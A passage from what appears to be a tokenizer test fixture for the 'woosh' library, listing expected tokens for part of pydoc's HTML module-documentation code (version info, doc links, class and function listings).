woosh.Token(woosh.OP, ')', 753, 46, 753, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 753, 47, 754, 0),
woosh.Token(woosh.DEDENT, ' ', 754, 0, 754, 8),
woosh.Token(woosh.NAME, 'except', 754, 8, 754, 14),
woosh.Token(woosh.NAME, 'TypeError', 754, 15, 754, 24),
woosh.Token(woosh.OP, ':', 754, 24, 754, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 754, 25, 755, 0),
woosh.Token(woosh.INDENT, ' ', 755, 0, 755, 12),
woosh.Token(woosh.NAME, 'filelink', 755, 12, 755, 20),
woosh.Token(woosh.OP, '=', 755, 21, 755, 22),
woosh.Token(woosh.STRING, "'(built-in)'", 755, 23, 755, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 755, 35, 756, 0),
woosh.Token(woosh.DEDENT, ' ', 756, 0, 756, 8),
woosh.Token(woosh.NAME, 'info', 756, 8, 756, 12),
woosh.Token(woosh.OP, '=', 756, 13, 756, 14),
woosh.Token(woosh.OP, '[', 756, 15, 756, 16),
woosh.Token(woosh.OP, ']', 756, 16, 756, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 756, 17, 757, 0),
woosh.Token(woosh.NAME, 'if', 757, 8, 757, 10),
woosh.Token(woosh.NAME, 'hasattr', 757, 11, 757, 18),
woosh.Token(woosh.OP, '(', 757, 18, 757, 19),
woosh.Token(woosh.NAME, 'object', 757, 19, 757, 25),
woosh.Token(woosh.OP, ',', 757, 25, 757, 26),
woosh.Token(woosh.STRING, "'__version__'", 757, 27, 757, 40),
woosh.Token(woosh.OP, ')', 757, 40, 757, 41),
woosh.Token(woosh.OP, ':', 757, 41, 757, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 757, 42, 758, 0),
woosh.Token(woosh.INDENT, ' ', 758, 0, 758, 12),
woosh.Token(woosh.NAME, 'version', 758, 12, 758, 19),
woosh.Token(woosh.OP, '=', 758, 20, 758, 21),
woosh.Token(woosh.NAME, 'str', 758, 22, 758, 25),
woosh.Token(woosh.OP, '(', 758, 25, 758, 26),
woosh.Token(woosh.NAME, 'object', 758, 26, 758, 32),
woosh.Token(woosh.OP, '.', 758, 32, 758, 33),
woosh.Token(woosh.NAME, '__version__', 758, 33, 758, 44),
woosh.Token(woosh.OP, ')', 758, 44, 758, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 758, 45, 759, 0),
woosh.Token(woosh.NAME, 'if', 759, 12, 759, 14),
woosh.Token(woosh.NAME, 'version', 759, 15, 759, 22),
woosh.Token(woosh.OP, '[', 759, 22, 759, 23),
woosh.Token(woosh.OP, ':', 759, 23, 759, 24),
woosh.Token(woosh.NUMBER, '11', 759, 24, 759, 26),
woosh.Token(woosh.OP, ']', 759, 26, 759, 27),
woosh.Token(woosh.OP, '==', 759, 28, 759, 30),
woosh.Token(woosh.STRING, "'$'", 759, 31, 759, 34),
woosh.Token(woosh.OP, '+', 759, 35, 759, 36),
woosh.Token(woosh.STRING, "'Revision: '", 759, 37, 759, 49),
woosh.Token(woosh.NAME, 'and', 759, 50, 759, 53),
woosh.Token(woosh.NAME, 'version', 759, 54, 759, 61),
woosh.Token(woosh.OP, '[', 759, 61, 759, 62),
woosh.Token(woosh.OP, '-', 759, 62, 759, 63),
woosh.Token(woosh.NUMBER, '1', 759, 63, 759, 64),
woosh.Token(woosh.OP, ':', 759, 64, 759, 65),
woosh.Token(woosh.OP, ']', 759, 65, 759, 66),
woosh.Token(woosh.OP, '==', 759, 67, 759, 69),
woosh.Token(woosh.STRING, "'$'", 759, 70, 759, 73),
woosh.Token(woosh.OP, ':', 759, 73, 759, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 759, 74, 760, 0),
woosh.Token(woosh.INDENT, ' ', 760, 0, 760, 16),
woosh.Token(woosh.NAME, 'version', 760, 16, 760, 23),
woosh.Token(woosh.OP, '=', 760, 24, 760, 25),
woosh.Token(woosh.NAME, 'version', 760, 26, 760, 33),
woosh.Token(woosh.OP, '[', 760, 33, 760, 34),
woosh.Token(woosh.NUMBER, '11', 760, 34, 760, 36),
woosh.Token(woosh.OP, ':', 760, 36, 760, 37),
woosh.Token(woosh.OP, '-', 760, 37, 760, 38),
woosh.Token(woosh.NUMBER, '1', 760, 38, 760, 39),
woosh.Token(woosh.OP, ']', 760, 39, 760, 40),
woosh.Token(woosh.OP, '.', 760, 40, 760, 41),
woosh.Token(woosh.NAME, 'strip', 760, 41, 760, 46),
woosh.Token(woosh.OP, '(', 760, 46, 760, 47),
woosh.Token(woosh.OP, ')', 760, 47, 760, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 760, 48, 761, 0),
woosh.Token(woosh.DEDENT, ' ', 761, 0, 761, 12),
woosh.Token(woosh.NAME, 'info', 761, 12, 761, 16),
woosh.Token(woosh.OP, '.', 761, 16, 761, 17),
woosh.Token(woosh.NAME, 'append', 761, 17, 761, 23),
woosh.Token(woosh.OP, '(', 761, 23, 761, 24),
woosh.Token(woosh.STRING, "'version %s'", 761, 24, 761, 36),
woosh.Token(woosh.OP, '%', 761, 37, 761, 38),
woosh.Token(woosh.NAME, 'self', 761, 39, 761, 43),
woosh.Token(woosh.OP, '.', 761, 43, 761, 44),
woosh.Token(woosh.NAME, 'escape', 761, 44, 761, 50),
woosh.Token(woosh.OP, '(', 761, 50, 761, 51),
woosh.Token(woosh.NAME, 'version', 761, 51, 761, 58),
woosh.Token(woosh.OP, ')', 761, 58, 761, 59),
woosh.Token(woosh.OP, ')', 761, 59, 761, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 761, 60, 762, 0),
woosh.Token(woosh.DEDENT, ' ', 762, 0, 762, 8),
woosh.Token(woosh.NAME, 'if', 762, 8, 762, 10),
woosh.Token(woosh.NAME, 'hasattr', 762, 11, 762, 18),
woosh.Token(woosh.OP, '(', 762, 18, 762, 19),
woosh.Token(woosh.NAME, 'object', 762, 19, 762, 25),
woosh.Token(woosh.OP, ',', 762, 25, 762, 26),
woosh.Token(woosh.STRING, "'__date__'", 762, 27, 762, 37),
woosh.Token(woosh.OP, ')', 762, 37, 762, 38),
woosh.Token(woosh.OP, ':', 762, 38, 762, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 762, 39, 763, 0),
woosh.Token(woosh.INDENT, ' ', 763, 0, 763, 12),
woosh.Token(woosh.NAME, 'info', 763, 12, 763, 16),
woosh.Token(woosh.OP, '.', 763, 16, 763, 17),
woosh.Token(woosh.NAME, 'append', 763, 17, 763, 23),
woosh.Token(woosh.OP, '(', 763, 23, 763, 24),
woosh.Token(woosh.NAME, 'self', 763, 24, 763, 28),
woosh.Token(woosh.OP, '.', 763, 28, 763, 29),
woosh.Token(woosh.NAME, 'escape', 763, 29, 763, 35),
woosh.Token(woosh.OP, '(', 763, 35, 763, 36),
woosh.Token(woosh.NAME, 'str', 763, 36, 763, 39),
woosh.Token(woosh.OP, '(', 763, 39, 763, 40),
woosh.Token(woosh.NAME, 'object', 763, 40, 763, 46),
woosh.Token(woosh.OP, '.', 763, 46, 763, 47),
woosh.Token(woosh.NAME, '__date__', 763, 47, 763, 55),
woosh.Token(woosh.OP, ')', 763, 55, 763, 56),
woosh.Token(woosh.OP, ')', 763, 56, 763, 57),
woosh.Token(woosh.OP, ')', 763, 57, 763, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 763, 58, 764, 0),
woosh.Token(woosh.DEDENT, ' ', 764, 0, 764, 8),
woosh.Token(woosh.NAME, 'if', 764, 8, 764, 10),
woosh.Token(woosh.NAME, 'info', 764, 11, 764, 15),
woosh.Token(woosh.OP, ':', 764, 15, 764, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 764, 16, 765, 0),
woosh.Token(woosh.INDENT, ' ', 765, 0, 765, 12),
woosh.Token(woosh.NAME, 'head', 765, 12, 765, 16),
woosh.Token(woosh.OP, '=', 765, 17, 765, 18),
woosh.Token(woosh.NAME, 'head', 765, 19, 765, 23),
woosh.Token(woosh.OP, '+', 765, 24, 765, 25),
woosh.Token(woosh.STRING, "' (%s)'", 765, 26, 765, 33),
woosh.Token(woosh.OP, '%', 765, 34, 765, 35),
woosh.Token(woosh.STRING, "', '", 765, 36, 765, 40),
woosh.Token(woosh.OP, '.', 765, 40, 765, 41),
woosh.Token(woosh.NAME, 'join', 765, 41, 765, 45),
woosh.Token(woosh.OP, '(', 765, 45, 765, 46),
woosh.Token(woosh.NAME, 'info', 765, 46, 765, 50),
woosh.Token(woosh.OP, ')', 765, 50, 765, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 765, 51, 766, 0),
woosh.Token(woosh.DEDENT, ' ', 766, 0, 766, 8),
woosh.Token(woosh.NAME, 'docloc', 766, 8, 766, 14),
woosh.Token(woosh.OP, '=', 766, 15, 766, 16),
woosh.Token(woosh.NAME, 'self', 766, 17, 766, 21),
woosh.Token(woosh.OP, '.', 766, 21, 766, 22),
woosh.Token(woosh.NAME, 'getdocloc', 766, 22, 766, 31),
woosh.Token(woosh.OP, '(', 766, 31, 766, 32),
woosh.Token(woosh.NAME, 'object', 766, 32, 766, 38),
woosh.Token(woosh.OP, ')', 766, 38, 766, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 766, 39, 767, 0),
woosh.Token(woosh.NAME, 'if', 767, 8, 767, 10),
woosh.Token(woosh.NAME, 'docloc', 767, 11, 767, 17),
woosh.Token(woosh.NAME, 'is', 767, 18, 767, 20),
woosh.Token(woosh.NAME, 'not', 767, 21, 767, 24),
woosh.Token(woosh.NAME, 'None', 767, 25, 767, 29),
woosh.Token(woosh.OP, ':', 767, 29, 767, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 767, 30, 768, 0),
woosh.Token(woosh.INDENT, ' ', 768, 0, 768, 12),
woosh.Token(woosh.NAME, 'docloc', 768, 12, 768, 18),
woosh.Token(woosh.OP, '=', 768, 19, 768, 20),
woosh.Token(woosh.STRING, '\'<br><a href="%(docloc)s">Module Reference</a>\'', 768, 21, 768, 68),
woosh.Token(woosh.OP, '%', 768, 69, 768, 70),
woosh.Token(woosh.NAME, 'locals', 768, 71, 768, 77),
woosh.Token(woosh.OP, '(', 768, 77, 768, 78),
woosh.Token(woosh.OP, ')', 768, 78, 768, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 768, 79, 769, 0),
woosh.Token(woosh.DEDENT, ' ', 769, 0, 769, 8),
woosh.Token(woosh.NAME, 'else', 769, 8, 769, 12),
woosh.Token(woosh.OP, ':', 769, 12, 769, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 769, 13, 770, 0),
woosh.Token(woosh.INDENT, ' ', 770, 0, 770, 12),
woosh.Token(woosh.NAME, 'docloc', 770, 12, 770, 18),
woosh.Token(woosh.OP, '=', 770, 19, 770, 20),
woosh.Token(woosh.STRING, "''", 770, 21, 770, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 770, 23, 771, 0),
woosh.Token(woosh.DEDENT, ' ', 771, 0, 771, 8),
woosh.Token(woosh.NAME, 'result', 771, 8, 771, 14),
woosh.Token(woosh.OP, '=', 771, 15, 771, 16),
woosh.Token(woosh.NAME, 'self', 771, 17, 771, 21),
woosh.Token(woosh.OP, '.', 771, 21, 771, 22),
woosh.Token(woosh.NAME, 'heading', 771, 22, 771, 29),
woosh.Token(woosh.OP, '(', 771, 29, 771, 30),
woosh.Token(woosh.NAME, 'head', 772, 12, 772, 16),
woosh.Token(woosh.OP, ',', 772, 16, 772, 17),
woosh.Token(woosh.STRING, "'#ffffff'", 772, 18, 772, 27),
woosh.Token(woosh.OP, ',', 772, 27, 772, 28),
woosh.Token(woosh.STRING, "'#7799ee'", 772, 29, 772, 38),
woosh.Token(woosh.OP, ',', 772, 38, 772, 39),
woosh.Token(woosh.STRING, '\'<a href=".">index</a><br>\'', 773, 12, 773, 39),
woosh.Token(woosh.OP, '+', 773, 40, 773, 41),
woosh.Token(woosh.NAME, 'filelink', 773, 42, 773, 50),
woosh.Token(woosh.OP, '+', 773, 51, 773, 52),
woosh.Token(woosh.NAME, 'docloc', 773, 53, 773, 59),
woosh.Token(woosh.OP, ')', 773, 59, 773, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 773, 60, 774, 0),
woosh.Token(woosh.NAME, 'modules', 775, 8, 775, 15),
woosh.Token(woosh.OP, '=', 775, 16, 775, 17),
woosh.Token(woosh.NAME, 'inspect', 775, 18, 775, 25),
woosh.Token(woosh.OP, '.', 775, 25, 775, 26),
woosh.Token(woosh.NAME, 'getmembers', 775, 26, 775, 36),
woosh.Token(woosh.OP, '(', 775, 36, 775, 37),
woosh.Token(woosh.NAME, 'object', 775, 37, 775, 43),
woosh.Token(woosh.OP, ',', 775, 43, 775, 44),
woosh.Token(woosh.NAME, 'inspect', 775, 45, 775, 52),
woosh.Token(woosh.OP, '.', 775, 52, 775, 53),
woosh.Token(woosh.NAME, 'ismodule', 775, 53, 775, 61),
woosh.Token(woosh.OP, ')', 775, 61, 775, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 775, 62, 776, 0),
woosh.Token(woosh.NAME, 'classes', 777, 8, 777, 15),
woosh.Token(woosh.OP, ',', 777, 15, 777, 16),
woosh.Token(woosh.NAME, 'cdict', 777, 17, 777, 22),
woosh.Token(woosh.OP, '=', 777, 23, 777, 24),
woosh.Token(woosh.OP, '[', 777, 25, 777, 26),
woosh.Token(woosh.OP, ']', 777, 26, 777, 27),
woosh.Token(woosh.OP, ',', 777, 27, 777, 28),
woosh.Token(woosh.OP, '{', 777, 29, 777, 30),
woosh.Token(woosh.OP, '}', 777, 30, 777, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 777, 31, 778, 0),
woosh.Token(woosh.NAME, 'for', 778, 8, 778, 11),
woosh.Token(woosh.NAME, 'key', 778, 12, 778, 15),
woosh.Token(woosh.OP, ',', 778, 15, 778, 16),
woosh.Token(woosh.NAME, 'value', 778, 17, 778, 22),
woosh.Token(woosh.NAME, 'in', 778, 23, 778, 25),
woosh.Token(woosh.NAME, 'inspect', 778, 26, 778, 33),
woosh.Token(woosh.OP, '.', 778, 33, 778, 34),
woosh.Token(woosh.NAME, 'getmembers', 778, 34, 778, 44),
woosh.Token(woosh.OP, '(', 778, 44, 778, 45),
woosh.Token(woosh.NAME, 'object', 778, 45, 778, 51),
woosh.Token(woosh.OP, ',', 778, 51, 778, 52),
woosh.Token(woosh.NAME, 'inspect', 778, 53, 778, 60),
woosh.Token(woosh.OP, '.', 778, 60, 778, 61),
woosh.Token(woosh.NAME, 'isclass', 778, 61, 778, 68),
woosh.Token(woosh.OP, ')', 778, 68, 778, 69),
woosh.Token(woosh.OP, ':', 778, 69, 778, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 778, 70, 779, 0),
woosh.Token(woosh.COMMENT, '# if __all__ exists, believe it. Otherwise use old heuristic.', 779, 12, 779, 74),
woosh.Token(woosh.INDENT, ' ', 780, 0, 780, 12),
woosh.Token(woosh.NAME, 'if', 780, 12, 780, 14),
woosh.Token(woosh.OP, '(', 780, 15, 780, 16),
woosh.Token(woosh.NAME, 'all', 780, 16, 780, 19),
woosh.Token(woosh.NAME, 'is', 780, 20, 780, 22),
woosh.Token(woosh.NAME, 'not', 780, 23, 780, 26),
woosh.Token(woosh.NAME, 'None', 780, 27, 780, 31),
woosh.Token(woosh.NAME, 'or', 780, 32, 780, 34),
woosh.Token(woosh.OP, '(', 781, 16, 781, 17),
woosh.Token(woosh.NAME, 'inspect', 781, 17, 781, 24),
woosh.Token(woosh.OP, '.', 781, 24, 781, 25),
woosh.Token(woosh.NAME, 'getmodule', 781, 25, 781, 34),
woosh.Token(woosh.OP, '(', 781, 34, 781, 35),
woosh.Token(woosh.NAME, 'value', 781, 35, 781, 40),
woosh.Token(woosh.OP, ')', 781, 40, 781, 41),
woosh.Token(woosh.NAME, 'or', 781, 42, 781, 44),
woosh.Token(woosh.NAME, 'object', 781, 45, 781, 51),
woosh.Token(woosh.OP, ')', 781, 51, 781, 52),
woosh.Token(woosh.NAME, 'is', 781, 53, 781, 55),
woosh.Token(woosh.NAME, 'object', 781, 56, 781, 62),
woosh.Token(woosh.OP, ')', 781, 62, 781, 63),
woosh.Token(woosh.OP, ':', 781, 63, 781, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 781, 64, 782, 0),
woosh.Token(woosh.INDENT, ' ', 782, 0, 782, 16),
woosh.Token(woosh.NAME, 'if', 782, 16, 782, 18),
woosh.Token(woosh.NAME, 'visiblename', 782, 19, 782, 30),
woosh.Token(woosh.OP, '(', 782, 30, 782, 31),
woosh.Token(woosh.NAME, 'key', 782, 31, 782, 34),
woosh.Token(woosh.OP, ',', 782, 34, 782, 35),
woosh.Token(woosh.NAME, 'all', 782, 36, 782, 39),
woosh.Token(woosh.OP, ',', 782, 39, 782, 40),
woosh.Token(woosh.NAME, 'object', 782, 41, 782, 47),
woosh.Token(woosh.OP, ')', 782, 47, 782, 48),
woosh.Token(woosh.OP, ':', 782, 48, 782, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 782, 49, 783, 0),
woosh.Token(woosh.INDENT, ' ', 783, 0, 783, 20),
woosh.Token(woosh.NAME, 'classes', 783, 20, 783, 27),
woosh.Token(woosh.OP, '.', 783, 27, 783, 28),
woosh.Token(woosh.NAME, 'append', 783, 28, 783, 34),
woosh.Token(woosh.OP, '(', 783, 34, 783, 35),
woosh.Token(woosh.OP, '(', 783, 35, 783, 36),
woosh.Token(woosh.NAME, 'key', 783, 36, 783, 39),
woosh.Token(woosh.OP, ',', 783, 39, 783, 40),
woosh.Token(woosh.NAME, 'value', 783, 41, 783, 46),
woosh.Token(woosh.OP, ')', 783, 46, 783, 47),
woosh.Token(woosh.OP, ')', 783, 47, 783, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 783, 48, 784, 0),
woosh.Token(woosh.NAME, 'cdict', 784, 20, 784, 25),
woosh.Token(woosh.OP, '[', 784, 25, 784, 26),
woosh.Token(woosh.NAME, 'key', 784, 26, 784, 29),
woosh.Token(woosh.OP, ']', 784, 29, 784, 30),
woosh.Token(woosh.OP, '=', 784, 31, 784, 32),
woosh.Token(woosh.NAME, 'cdict', 784, 33, 784, 38),
woosh.Token(woosh.OP, '[', 784, 38, 784, 39),
woosh.Token(woosh.NAME, 'value', 784, 39, 784, 44),
woosh.Token(woosh.OP, ']', 784, 44, 784, 45),
woosh.Token(woosh.OP, '=', 784, 46, 784, 47),
woosh.Token(woosh.STRING, "'#'", 784, 48, 784, 51),
woosh.Token(woosh.OP, '+', 784, 52, 784, 53),
woosh.Token(woosh.NAME, 'key', 784, 54, 784, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 784, 57, 785, 0),
woosh.Token(woosh.DEDENT, ' ', 785, 0, 785, 8),
woosh.Token(woosh.DEDENT, '', 785, 8, 785, 8),
woosh.Token(woosh.DEDENT, '', 785, 8, 785, 8),
woosh.Token(woosh.NAME, 'for', 785, 8, 785, 11),
woosh.Token(woosh.NAME, 'key', 785, 12, 785, 15),
woosh.Token(woosh.OP, ',', 785, 15, 785, 16),
woosh.Token(woosh.NAME, 'value', 785, 17, 785, 22),
woosh.Token(woosh.NAME, 'in', 785, 23, 785, 25),
woosh.Token(woosh.NAME, 'classes', 785, 26, 785, 33),
woosh.Token(woosh.OP, ':', 785, 33, 785, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 785, 34, 786, 0),
woosh.Token(woosh.INDENT, ' ', 786, 0, 786, 12),
woosh.Token(woosh.NAME, 'for', 786, 12, 786, 15),
woosh.Token(woosh.NAME, 'base', 786, 16, 786, 20),
woosh.Token(woosh.NAME, 'in', 786, 21, 786, 23),
woosh.Token(woosh.NAME, 'value', 786, 24, 786, 29),
woosh.Token(woosh.OP, '.', 786, 29, 786, 30),
woosh.Token(woosh.NAME, '__bases__', 786, 30, 786, 39),
woosh.Token(woosh.OP, ':', 786, 39, 786, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 786, 40, 787, 0),
woosh.Token(woosh.INDENT, ' ', 787, 0, 787, 16),
woosh.Token(woosh.NAME, 'key', 787, 16, 787, 19),
woosh.Token(woosh.OP, ',', 787, 19, 787, 20),
woosh.Token(woosh.NAME, 'modname', 787, 21, 787, 28),
woosh.Token(woosh.OP, '=', 787, 29, 787, 30),
woosh.Token(woosh.NAME, 'base', 787, 31, 787, 35),
woosh.Token(woosh.OP, '.', 787, 35, 787, 36),
woosh.Token(woosh.NAME, '__name__', 787, 36, 787, 44),
woosh.Token(woosh.OP, ',', 787, 44, 787, 45),
woosh.Token(woosh.NAME, 'base', 787, 46, 787, 50),
woosh.Token(woosh.OP, '.', 787, 50, 787, 51),
woosh.Token(woosh.NAME, '__module__', 787, 51, 787, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 787, 61, 788, 0),
woosh.Token(woosh.NAME, 'module', 788, 16, 788, 22),
woosh.Token(woosh.OP, '=', 788, 23, 788, 24),
woosh.Token(woosh.NAME, 'sys', 788, 25, 788, 28),
woosh.Token(woosh.OP, '.', 788, 28, 788, 29),
woosh.Token(woosh.NAME, 'modules', 788, 29, 788, 36),
woosh.Token(woosh.OP, '.', 788, 36, 788, 37),
woosh.Token(woosh.NAME, 'get', 788, 37, 788, 40),
woosh.Token(woosh.OP, '(', 788, 40, 788, 41),
woosh.Token(woosh.NAME, 'modname', 788, 41, 788, 48),
woosh.Token(woosh.OP, ')', 788, 48, 788, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 788, 49, 789, 0),
woosh.Token(woosh.NAME, 'if', 789, 16, 789, 18),
woosh.Token(woosh.NAME, 'modname', 789, 19, 789, 26),
woosh.Token(woosh.OP, '!=', 789, 27, 789, 29),
woosh.Token(woosh.NAME, 'name', 789, 30, 789, 34),
woosh.Token(woosh.NAME, 'and', 789, 35, 789, 38),
woosh.Token(woosh.NAME, 'module', 789, 39, 789, 45),
woosh.Token(woosh.NAME, 'and', 789, 46, 789, 49),
woosh.Token(woosh.NAME, 'hasattr', 789, 50, 789, 57),
woosh.Token(woosh.OP, '(', 789, 57, 789, 58),
woosh.Token(woosh.NAME, 'module', 789, 58, 789, 64),
woosh.Token(woosh.OP, ',', 789, 64, 789, 65),
woosh.Token(woosh.NAME, 'key', 789, 66, 789, 69),
woosh.Token(woosh.OP, ')', 789, 69, 789, 70),
woosh.Token(woosh.OP, ':', 789, 70, 789, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 789, 71, 790, 0),
woosh.Token(woosh.INDENT, ' ', 790, 0, 790, 20),
woosh.Token(woosh.NAME, 'if', 790, 20, 790, 22),
woosh.Token(woosh.NAME, 'getattr', 790, 23, 790, 30),
woosh.Token(woosh.OP, '(', 790, 30, 790, 31),
woosh.Token(woosh.NAME, 'module', 790, 31, 790, 37),
woosh.Token(woosh.OP, ',', 790, 37, 790, 38),
woosh.Token(woosh.NAME, 'key', 790, 39, 790, 42),
woosh.Token(woosh.OP, ')', 790, 42, 790, 43),
woosh.Token(woosh.NAME, 'is', 790, 44, 790, 46),
woosh.Token(woosh.NAME, 'base', 790, 47, 790, 51),
woosh.Token(woosh.OP, ':', 790, 51, 790, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 790, 52, 791, 0),
woosh.Token(woosh.INDENT, ' ', 791, 0, 791, 24),
woosh.Token(woosh.NAME, 'if', 791, 24, 791, 26),
woosh.Token(woosh.NAME, 'not', 791, 27, 791, 30),
woosh.Token(woosh.NAME, 'key', 791, 31, 791, 34),
woosh.Token(woosh.NAME, 'in', 791, 35, 791, 37),
woosh.Token(woosh.NAME, 'cdict', 791, 38, 791, 43),
woosh.Token(woosh.OP, ':', 791, 43, 791, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 791, 44, 792, 0),
woosh.Token(woosh.INDENT, ' ', 792, 0, 792, 28),
woosh.Token(woosh.NAME, 'cdict', 792, 28, 792, 33),
woosh.Token(woosh.OP, '[', 792, 33, 792, 34),
woosh.Token(woosh.NAME, 'key', 792, 34, 792, 37),
woosh.Token(woosh.OP, ']', 792, 37, 792, 38),
woosh.Token(woosh.OP, '=', 792, 39, 792, 40),
woosh.Token(woosh.NAME, 'cdict', 792, 41, 792, 46),
woosh.Token(woosh.OP, '[', 792, 46, 792, 47),
woosh.Token(woosh.NAME, 'base', 792, 47, 792, 51),
woosh.Token(woosh.OP, ']', 792, 51, 792, 52),
woosh.Token(woosh.OP, '=', 792, 53, 792, 54),
woosh.Token(woosh.NAME, 'modname', 792, 55, 792, 62),
woosh.Token(woosh.OP, '+', 792, 63, 792, 64),
woosh.Token(woosh.STRING, "'.html#'", 792, 65, 792, 73),
woosh.Token(woosh.OP, '+', 792, 74, 792, 75),
woosh.Token(woosh.NAME, 'key', 792, 76, 792, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 792, 79, 793, 0),
woosh.Token(woosh.DEDENT, ' ', 793, 0, 793, 8),
woosh.Token(woosh.DEDENT, '', 793, 8, 793, 8),
woosh.Token(woosh.DEDENT, '', 793, 8, 793, 8),
woosh.Token(woosh.DEDENT, '', 793, 8, 793, 8),
woosh.Token(woosh.DEDENT, '', 793, 8, 793, 8),
woosh.Token(woosh.NAME, 'funcs', 793, 8, 793, 13),
woosh.Token(woosh.OP, ',', 793, 13, 793, 14),
woosh.Token(woosh.NAME, 'fdict', 793, 15, 793, 20),
woosh.Token(woosh.OP, '=', 793, 21, 793, 22),
woosh.Token(woosh.OP, '[', 793, 23, 793, 24),
woosh.Token(woosh.OP, ']', 793, 24, 793, 25),
woosh.Token(woosh.OP, ',', 793, 25, 793, 26),
woosh.Token(woosh.OP, '{', 793, 27, 793, 28),
woosh.Token(woosh.OP, '}', 793, 28, 793, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 793, 29, 794, 0),
woosh.Token(woosh.NAME, 'for', 794, 8, 794, 11),
woosh.Token(woosh.NAME, 'key', 794, 12, 794, 15),
woosh.Token(woosh.OP, ',', 794, 15, 794, 16),
woosh.Token(woosh.NAME, 'value', 794, 17, 794, 22),
woosh.Token(woosh.NAME, 'in', 794, 23, 794, 25),
woosh.Token(woosh.NAME, 'inspect', 794, 26, 794, 33),
woosh.Token(woosh.OP, '.', 794, 33, 794, 34),
woosh.Token(woosh.NAME, 'getmembers', 794, 34, 794, 44),
woosh.Token(woosh.OP, '(', 794, 44, 794, 45),
woosh.Token(woosh.NAME, 'object', 794, 45, 794, 51),
woosh.Token(woosh.OP, ',', 794, 51, 794, 52),
woosh.Token(woosh.NAME, 'inspect', 794, 53, 794, 60),
woosh.Token(woosh.OP, '.', 794, 60, 794, 61),
woosh.Token(woosh.NAME, 'isroutine', 794, 61, 794, 70),
woosh.Token(woosh.OP, ')', 794, 70, 794, 71),
woosh.Token(woosh.OP, ':', 794, 71, 794, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 794, 72, 795, 0),
woosh.Token(woosh.COMMENT, '# if __all__ exists, believe it. Otherwise use old heuristic.', 795, 12, 795, 74),
woosh.Token(woosh.INDENT, ' ', 796, 0, 796, 12),
woosh.Token(woosh.NAME, 'if', 796, 12, 796, 14),
woosh.Token(woosh.OP, '(', 796, 15, 796, 16),
woosh.Token(woosh.NAME, 'all', 796, 16, 796, 19),
woosh.Token(woosh.NAME, 'is', 796, 20, 796, 22),
woosh.Token(woosh.NAME, 'not', 796, 23, 796, 26),
woosh.Token(woosh.NAME, 'None', 796, 27, 796, 31),
woosh.Token(woosh.NAME, 'or', 796, 32, 796, 34),
woosh.Token(woosh.NAME, 'inspect', 797, 16, 797, 23),
woosh.Token(woosh.OP, '.', 797, 23, 797, 24),
woosh.Token(woosh.NAME, 'isbuiltin', 797, 24, 797, 33),
woosh.Token(woosh.OP, '(', 797, 33, 797, 34),
woosh.Token(woosh.NAME, 'value', 797, 34, 797, 39),
woosh.Token(woosh.OP, ')', 797, 39, 797, 40),
woosh.Token(woosh.NAME, 'or', 797, 41, 797, 43),
woosh.Token(woosh.NAME, 'inspect', 797, 44, 797, 51),
woosh.Token(woosh.OP, '.', 797, 51, 797, 52),
woosh.Token(woosh.NAME, 'getmodule', 797, 52, 797, 61),
woosh.Token(woosh.OP, '(', 797, 61, 797, 62),
woosh.Token(woosh.NAME, 'value', 797, 62, 797, 67),
woosh.Token(woosh.OP, ')', 797, 67, 797, 68),
woosh.Token(woosh.NAME, 'is', 797, 69, 797, 71),
woosh.Token(woosh.NAME, 'object', 797, 72, 797, 78),
woosh.Token(woosh.OP, ')', 797, 78, 797, 79),
woosh.Token(woosh.OP, ':', 797, 79, 797, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 797, 80, 798, 0),
woosh.Token(woosh.INDENT, ' ', 798, 0, 798, 16),
woosh.Token(woosh.NAME, 'if', 798, 16, 798, 18),
woosh.Token(woosh.NAME, 'visiblename', 798, 19, 798, 30),
woosh.Token(woosh.OP, '(', 798, 30, 798, 31),
woosh.Token(woosh.NAME, 'key', 798, 31, 798, 34),
woosh.Token(woosh.OP, ',', 798, 34, 798, 35),
woosh.Token(woosh.NAME, 'all', 798, 36, 798, 39),
woosh.Token(woosh.OP, ',', 798, 39, 798, 40),
woosh.Token(woosh.NAME, 'object', 798, 41, 798, 47),
woosh.Token(woosh.OP, ')', 798, 47, 798, 48),
woosh.Token(woosh.OP, ':', 798, 48, 798, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 798, 49, 799, 0),
woosh.Token(woosh.INDENT, ' ', 799, 0, 799, 20),
woosh.Token(woosh.NAME, 'funcs', 799, 20, 799, 25),
woosh.Token(woosh.OP, '.', 799, 25, 799, 26),
woosh.Token(woosh.NAME, 'append', 799, 26, 799, 32),
woosh.Token(woosh.OP, '(', 799, 32, 799, 33),
woosh.Token(woosh.OP, '(', 799, 33, 799, 34),
